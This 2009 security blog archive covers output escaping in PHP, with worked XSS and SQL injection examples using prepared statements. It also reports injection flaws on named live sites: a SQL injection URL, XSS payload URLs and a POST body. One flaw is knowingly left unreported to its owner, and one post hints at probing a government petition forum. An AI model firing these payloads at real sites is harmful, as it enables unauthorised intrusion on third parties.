Archive for June, 2009

Google's PHP performance tips – What about security?

June 25, 2009

Today Travis Biehn posted a link on the Full Disclosure mailing list to Google's “PHP performance tips”.

Don’t copy variables for no reason.

Sometimes PHP novices attempt to make their code “cleaner” by copying predefined variables to variables with shorter names. What this actually results in is doubled memory consumption, and therefore, slow scripts. In the following example, imagine if a malicious user had inserted 512KB worth of characters into a textarea field. This would result in 1MB of memory being used!

BAD:
$description = $_POST['description'];
echo $description;

GOOD:
echo $_POST['description'];

My addition:

MUCH BETTER:
// Encode for the HTML context; ENT_QUOTES also covers single quotes, and the
// charset must match the page's (before PHP 5.4 the default was ISO-8859-1).
echo htmlspecialchars($_POST['description'], ENT_QUOTES, 'UTF-8');

😉
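To make the difference concrete, here is an added example (not code from the original post or from Google's tips page). It stands in for the "description" form field from the tip above and renders it both raw, as Google's GOOD snippet does, and encoded, as the MUCH BETTER line does. The sample values are constructed and follow the kind of payloads used in the XSS reports further down this page; the function and CSS class names are assumptions for illustration.

```php
<?php
// Added example: reflecting $_POST['description'] with and without
// output encoding. Not from the original post or from Google's page.

declare(strict_types=1);

// Unsafe: the parameter is echoed unchanged into the HTML body.
function renderRaw(string $description): string
{
    return '<p class="description">' . $description . '</p>';
}

// Safe for an HTML body or a quoted attribute: & < > " and ' are encoded.
// The charset argument matters: before PHP 5.4 the default was ISO-8859-1,
// which is rarely what a UTF-8 page wants. From PHP 5.4 on, ENT_SUBSTITUTE
// keeps the function from returning an empty string on invalid UTF-8.
function renderEncoded(string $description): string
{
    $encoded = htmlspecialchars($description, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="description">' . $encoded . '</p>';
}

// Constructed sample inputs, playing the role of what a browser would POST.
$samples = [
    'benign'    => 'Hello <b>world</b> & friends',
    'break-out' => '"><script>alert(\'xss\');</script>',
    'attribute' => "' onmouseover='alert(1)",
    'bad-utf8'  => "caf\xE9",   // a Latin-1 byte, invalid as UTF-8
];

foreach ($samples as $label => $value) {
    $_POST['description'] = $value;
    echo "[$label]\n";
    echo '  raw:     ' . renderRaw($_POST['description']) . "\n";
    echo '  encoded: ' . renderEncoded($_POST['description']) . "\n";
}
```

Run it with `php example.php` and compare the two lines per sample: the raw line for "break-out" contains a live `<script>` element, the encoded line contains only entities. Two caveats a practitioner should keep in mind: htmlspecialchars() is the right encoder for HTML text and quoted attribute values only, and a value placed inside a `<script>` block, an inline event handler or a URL needs a different encoding for that context. Also, PHP strings are copy-on-write, so the assignment in Google's BAD snippet does not by itself duplicate the 512KB; the security point, however, applies equally to the BAD and GOOD versions.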

SQL Injection: barrysclipart.com

June 21, 2009

Uhhh, that's nice…

http://www.barrysclipart.com/barrysclipart.com/showgallery.php?cat=172’&thumb=1

I've tried to send an email to 'satellites@jupiterimages.com', which is linked from the contact button, but all I got back was this:

Final-Recipient: rfc822;satellites@jupiterimages.com
Action: failed
Status: 5.7.1
Diagnostic-Code: smtp;550 5.7.1 RESOLVER.RST.AuthRequired; authentication required

A whois on the domain shows the email address stacy.blume@gettyimages.com, so I sent her a quick notice. Let's see if I get an answer…
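For readers who want to see why a single quote appended to `cat=172` produces an error, here is an added example (not barrysclipart.com's code, whose source is not known). It shows the usual shape of a gallery query that concatenates the request parameter into the SQL text, next to the prepared-statement version. The table and column names are assumed, and an in-memory SQLite database via pdo_sqlite stands in for the real one so the script runs offline.

```php
<?php
// Added example: string-concatenated gallery query versus a bound parameter.
// Not the site's real code; table/column names and data are constructed.

declare(strict_types=1);

// Vulnerable pattern: the query-string value becomes part of the SQL text,
// so cat=172' leaves a dangling quote and cat=172 OR 1=1 widens the WHERE.
function galleryQueryUnsafe(string $cat): string
{
    return 'SELECT id, title FROM gallery WHERE cat = ' . $cat;
}

// Hardened: validate the id, then bind it; the SQL text never changes.
function galleryRowsSafe(PDO $db, string $cat): array
{
    if (!preg_match('/^\d{1,9}$/', $cat)) {
        throw new InvalidArgumentException('cat must be a non-negative integer');
    }
    $stmt = $db->prepare('SELECT id, title FROM gallery WHERE cat = :cat');
    $stmt->bindValue(':cat', (int) $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed test data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gallery (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$db->exec("INSERT INTO gallery (cat, title) VALUES (172, 'clipart 1'), (172, 'clipart 2'), (9, 'unrelated')");

// The values a tester tries: the normal id, the id with a trailing quote
// (the request from the screenshot), and a boolean tautology.
foreach (['172', "172'", '172 OR 1=1'] as $cat) {
    echo "cat=$cat\n";
    try {
        $rows = $db->query(galleryQueryUnsafe($cat))->fetchAll(PDO::FETCH_ASSOC);
        echo '  unsafe: ' . count($rows) . " row(s)\n";
    } catch (PDOException $e) {
        echo '  unsafe: SQL error, ' . $e->getMessage() . "\n";
    }
    try {
        $rows = galleryRowsSafe($db, $cat);
        echo '  safe:   ' . count($rows) . " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo '  safe:   rejected, ' . $e->getMessage() . "\n";
    }
}
```

The trailing quote makes the concatenated query fail with a parse error, which is the kind of message that shows up on the page; the tautology silently returns every row. The bound version either returns only the rows for category 172 or rejects the input before any SQL is run. Binding alone already stops the injection; the integer check on top of it is cheap and keeps nonsense values from reaching the database at all.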

XSSed: move-ya.com

June 21, 2009

During a short break I found another shop with XSS holes in it: move-ya.com

http://www.move-ya.com/shop/html/detailsearch/DetailSearch_Re105.php?W0=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E&W1=&W2=&W3=

I've sent them an email…

Internet censorship in germany

June 21, 2009

Germany is on the verge of censoring its Internet: The government – a grand coalition between the German social democrats and conservative party – seems united in its decision: On Thursday the parliament is to vote on the erection of an internet censorship architecture.

The Minister for Family Affairs Ursula von der Leyen kicked off and led the discussions within the German Federal Government to block Internet sites in order to fight child pornography. The general idea is to build a censorship architecture enabling the government to block content containing child pornography. The Federal Office of Criminal Investigation (BKA) is to administer the lists of sites to be blocked, and the Internet providers are obliged to erect the secret censorship architecture for the government.

Netzpolitik.org: The Dawning of Internet Censorship in Germany

*no comment*

EDIT: Here is the e-petition system of the German government: Internet – Keine Indizierung und Sperrung von Internetseiten

Isn't it funny that they use SMF 1.1.9 (Simple Machines Forum) to build an e-petition system? Maybe someone should have a closer look at it… 😉

XSSed: softerpore.com

June 21, 2009

New blog, new XSS…
Today I found an online shop that does a lot of comment spamming in blogs etc.: http://www.softerpore.com
It did not take long to find an XSS hole in the registration page:
Just POST
fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account
to http://www.softerpore.com/registration/

Or enter
"><SCrIPT>alert("Yes, I'm vulnerable to XSS")</SCrIPT>
into whichever input box you like.

And no… I will not give damn spammers a link to their website; you have to copy & paste… And in this case I will not send a notice to the administrator. He has enough to do with spamming etc., I don't want to disturb him…